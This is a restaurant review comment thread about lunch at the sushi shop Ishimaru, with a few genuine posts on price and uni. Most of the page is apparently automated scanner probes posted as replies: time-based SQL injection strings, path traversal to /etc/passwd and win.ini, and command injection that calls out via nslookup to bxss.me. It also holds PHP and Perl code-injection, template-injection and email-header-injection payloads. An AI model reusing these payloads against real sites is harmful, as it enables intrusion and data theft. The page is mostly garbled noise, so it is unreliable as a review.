\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Yee How
WEB-INF/web.xml
re: Yee How
WEB-INF\web.xml
re: Yee How
1
re: Yee How
1
re: Yee How
-1 OR 2+774-774-1=0+0+0+1 --
re: Yee How
-1 OR 3+774-774-1=0+0+0+1 --
re: Yee How
-1 OR 2+45-45-1=0+0+0+1
re: Yee How
-1 OR 3+45-45-1=0+0+0+1
re: Yee How
-1' OR 2+528-528-1=0+0+0+1 --
re: Yee How
-1' OR 3+528-528-1=0+0+0+1 --
re: Yee How
-1' OR 2+387-387-1=0+0+0+1 or 'ye4lPD8W'='
re: Yee How
-1' OR 3+387-387-1=0+0+0+1 or 'ye4lPD8W'='
re: Yee How
-1" OR 2+77-77-1=0+0+0+1 --
re: Yee How
-1" OR 3+77-77-1=0+0+0+1 --
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
ri5HtIKP'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 87=(SELECT 87 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 491=(SELECT 491 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 806=(SELECT 806 FROM PG_SLEEP(15))--
re: Yee How
Cg1eVRLP' OR 244=(SELECT 244 FROM PG_SLEEP(15))--
re: Yee How
xCuieA2C') OR 534=(SELECT 534 FROM PG_SLEEP(15))--
re: Yee How
eTReYKit')) OR 976=(SELECT 976 FROM PG_SLEEP(15))--
re: Yee How
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@5hsKz
I visited Ishimaru for lunch earlier in the year. Appetizer, 14 nigiri, soup, tamago, kanpyo, fruit. Rice was firm and very mild, nigiri were tiny. Couldn't really fault the sushi. Chef likes to talk and everyone was treated the same.
I was quoted JPY 16,500 for the set but the chef asked everyone if they wanted uni for a separate charge. This was 3 lobes of Daisen uni, which of course was fantastic, but ended up being an additional JPY 3,300.
Given the location I was expecting a bit more value for money and if a cheaper uni was included in the course I might have gone back but if you order the uni then little reason to leave Tokyo from a cost perspective and if you don't then you have to watch everyone else eat it. Disappointment either way.
Overall I'd still recommend it. If you can make a couple of hours between changing trains it's convenient. Easy to book. Lunch is Saturday only and I booked the same week. Two spare seats on my visit.
re: thetokyogourmet
f1MqGjlY
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
-1 OR 2+563-563-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+563-563-1=0+0+0+1
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
ulxgKNpl
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
-1 OR 2+760-760-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+760-760-1=0+0+0+1
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
i4OFex5B'; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
-5 OR 540=(SELECT 540 FROM PG_SLEEP(15))--
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
-5) OR 927=(SELECT 927 FROM PG_SLEEP(15))--
re: thetokyogourmet
8Ei59YMn'; waitfor delay '0:0:15' --
re: thetokyogourmet
-1)) OR 706=(SELECT 706 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5 OR 791=(SELECT 791 FROM PG_SLEEP(15))--
re: thetokyogourmet
OCzWJQ0r' OR 346=(SELECT 346 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5) OR 615=(SELECT 615 FROM PG_SLEEP(15))--
re: thetokyogourmet
M1CYVSP0') OR 984=(SELECT 984 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 664=(SELECT 664 FROM PG_SLEEP(15))--
re: thetokyogourmet
5xcJUcvX')) OR 849=(SELECT 849 FROM PG_SLEEP(15))--
re: thetokyogourmet
oj88qwUH' OR 17=(SELECT 17 FROM PG_SLEEP(15))--
re: thetokyogourmet
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
GufXthpW') OR 72=(SELECT 72 FROM PG_SLEEP(15))--
re: thetokyogourmet
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
DoITZADz')) OR 701=(SELECT 701 FROM PG_SLEEP(15))--
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@ThE5M
re: thetokyogourmet
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@LYgoA
re: thetokyogourmet
1LClq9ecO
re: thetokyogourmet
%0abcc:074625.67-16783.67.940ca.19990.2@bxss.me
re: thetokyogourmet
to@example.com>%0d%0abcc:074625.67-16784.67.940ca.19990.2@bxss.me
re: thetokyogourmet
response.write(9167990*9568743)
re: thetokyogourmet
'+response.write(9167990*9568743)+'
re: thetokyogourmet
"+response.write(9167990*9568743)+"
re: thetokyogourmet
<esi:include src="http://bxss.me/rpb.png"/>
re: thetokyogourmet
../../../../../../../../../../../../../../etc/passwd
re: thetokyogourmet
${9999898+9999085}
re: thetokyogourmet
../../../../../../../../../../../../../../windows/win.ini
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../../proc/version
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: thetokyogourmet
../../../../../../../../../../etc/passwd%00.jpg
re: thetokyogourmet
)
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: thetokyogourmet
!(()&&!|*|*|
re: thetokyogourmet
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: thetokyogourmet
^(#$!@#$)(()))******
re: thetokyogourmet
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: thetokyogourmet
echo nyiupf$()\ einvwh\nz^xyu||a #' &echo nyiupf$()\ einvwh\nz^xyu||a #|" &echo nyiupf$()\ einvwh\nz^xyu||a #
re: thetokyogourmet
/etc/passwd
re: thetokyogourmet
&echo byxyqr$()\ ejvaot\nz^xyu||a #' &echo byxyqr$()\ ejvaot\nz^xyu||a #|" &echo byxyqr$()\ ejvaot\nz^xyu||a #
re: thetokyogourmet
%2fetc%2fpasswd
re: thetokyogourmet
|echo oiesdk$()\ jldhta\nz^xyu||a #' |echo oiesdk$()\ jldhta\nz^xyu||a #|" |echo oiesdk$()\ jldhta\nz^xyu||a #
re: thetokyogourmet
/.././.././.././.././.././.././.././../etc/./passwd%00
re: thetokyogourmet
(nslookup hitatalbyqfnj7c51a.bxss.me||perl -e "gethostbyname('hitatalbyqfnj7c51a.bxss.me')")
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: thetokyogourmet
$(nslookup hitthayummfvdee86b.bxss.me||perl -e "gethostbyname('hitthayummfvdee86b.bxss.me')")
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: thetokyogourmet
'.gethostbyname(lc('hiteb'.'epmfrhvaa12de.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(86).chr(111).chr(74).'
re: thetokyogourmet
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: thetokyogourmet
&nslookup hitpriwwqpkbt6ae8e.bxss.me&'\"`0&nslookup hitpriwwqpkbt6ae8e.bxss.me&`'
re: thetokyogourmet
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: thetokyogourmet
".gethostbyname(lc("hitfc"."mfekdsif70a96.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(80).chr(113).chr(86)."
re: thetokyogourmet
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: thetokyogourmet
&(nslookup hitzpdwsiafhf38d5d.bxss.me||perl -e "gethostbyname('hitzpdwsiafhf38d5d.bxss.me')")&'\"`0&(nslookup hitzpdwsiafhf38d5d.bxss.me||perl -e "gethostbyname('hitzpdwsiafhf38d5d.bxss.me')")&`'
re: thetokyogourmet
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: thetokyogourmet
Http://bxss.me/t/fit.txt
re: thetokyogourmet
|(nslookup hitnfuqxuwbvg3d566.bxss.me||perl -e "gethostbyname('hitnfuqxuwbvg3d566.bxss.me')")
re: thetokyogourmet
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: thetokyogourmet
http://bxss.me/t/fit.txt%3F.jpg
re: thetokyogourmet
`(nslookup hitfceypsqjvia5f12.bxss.me||perl -e "gethostbyname('hitfceypsqjvia5f12.bxss.me')")`
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
/etc/shells
re: thetokyogourmet
;(nslookup hitlexfndbnuzec7e2.bxss.me||perl -e "gethostbyname('hitlexfndbnuzec7e2.bxss.me')")|(nslookup hitlexfndbnuzec7e2.bxss.me||perl -e "gethostbyname('hitlexfndbnuzec7e2.bxss.me')")&(nslookup hitlexfndbnuzec7e2.bxss.me||perl -e "gethostbyname('hitlexfndbnuzec7e2.bxss.me')")
re: thetokyogourmet
/\../\../\../\../\../\../\../etc/passwd
re: thetokyogourmet
c:/windows/win.ini
re: thetokyogourmet
/WEB-INF/web.xml
re: thetokyogourmet
bxss.me
re: thetokyogourmet
C:\WINDOWS\system32\drivers\etc\hosts
re: thetokyogourmet
../../../../../../../../../../windows/win.ini%00.jpg
re: thetokyogourmet
HttP://bxss.me/t/xss.html?%00
re: thetokyogourmet
/../../../../../../../../../../boot.ini
re: thetokyogourmet
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: thetokyogourmet
bxss.me/t/xss.html?%00
re: thetokyogourmet
"+"A".concat(70-3).concat(22*4).concat(118).concat(82).concat(113).concat(86)+(require"socket"
Socket.gethostbyname("hitqw"+"vtslduixf4763.bxss.me.")[3].to_s)+"
re: thetokyogourmet
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: thetokyogourmet
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: thetokyogourmet
'+'A'.concat(70-3).concat(22*4).concat(104).concat(69).concat(97).concat(66)+(require'socket'
Socket.gethostbyname('hitrr'+'kxpuodoubb53c.bxss.me.')[3].to_s)+'
re: thetokyogourmet
';print(md5(31337));$a='
re: thetokyogourmet
..\..\..\..\..\..\..\..\windows\win.ini
re: thetokyogourmet
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: thetokyogourmet
";print(md5(31337));$a="
re: thetokyogourmet
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: thetokyogourmet
${@print(md5(31337))}
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: thetokyogourmet
${@print(md5(31337))}\
re: thetokyogourmet
'"
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: thetokyogourmet
'.print(md5(31337)).'
re: thetokyogourmet
<!--
re: thetokyogourmet
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: thetokyogourmet
WEB-INF/web.xml
re: thetokyogourmet
WEB-INF\web.xml
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
-1 OR 2+185-185-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 3+185-185-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 2+796-796-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+796-796-1=0+0+0+1
re: thetokyogourmet
-1' OR 2+445-445-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 3+445-445-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 2+507-507-1=0+0+0+1 or 'WPlBg9QT'='
re: thetokyogourmet
-1' OR 3+507-507-1=0+0+0+1 or 'WPlBg9QT'='
re: thetokyogourmet
-1" OR 2+154-154-1=0+0+0+1 --
re: thetokyogourmet
-1" OR 3+154-154-1=0+0+0+1 --
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
zZ6mnz7r'; waitfor delay '0:0:15' --
re: thetokyogourmet
-5 OR 885=(SELECT 885 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5) OR 368=(SELECT 368 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 205=(SELECT 205 FROM PG_SLEEP(15))--
re: thetokyogourmet
wHSOtqam' OR 362=(SELECT 362 FROM PG_SLEEP(15))--
re: thetokyogourmet
N33froIM') OR 963=(SELECT 963 FROM PG_SLEEP(15))--
re: thetokyogourmet
y1RgPCBi')) OR 765=(SELECT 765 FROM PG_SLEEP(15))--
re: thetokyogourmet
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@vyjzS
Nice, but it is daisen uni no? Isn't it be expected it wouldn't be cheap?
re: guest
4WcXfqpC
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+445-445-1=0+0+0+1
re: guest
-1 OR 3+445-445-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
FKUcNEc0'; waitfor delay '0:0:15' --
re: guest
-5 OR 826=(SELECT 826 FROM PG_SLEEP(15))--
re: guest
-5) OR 283=(SELECT 283 FROM PG_SLEEP(15))--
re: guest
-1)) OR 318=(SELECT 318 FROM PG_SLEEP(15))--
re: guest
bPvyIdo1' OR 268=(SELECT 268 FROM PG_SLEEP(15))--
re: guest
bqZvvDcz') OR 411=(SELECT 411 FROM PG_SLEEP(15))--
re: guest
1pFUN2CT')) OR 834=(SELECT 834 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@1f4KM
re: guest
KyRcdqdk
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+178-178-1=0+0+0+1
re: guest
-1 OR 3+178-178-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
gidMEOJY'; waitfor delay '0:0:15' --
re: guest
-5 OR 464=(SELECT 464 FROM PG_SLEEP(15))--
re: guest
-5) OR 675=(SELECT 675 FROM PG_SLEEP(15))--
re: guest
-1)) OR 819=(SELECT 819 FROM PG_SLEEP(15))--
re: guest
rdomLzEz' OR 378=(SELECT 378 FROM PG_SLEEP(15))--
re: guest
e3pVVidQ') OR 827=(SELECT 827 FROM PG_SLEEP(15))--
re: guest
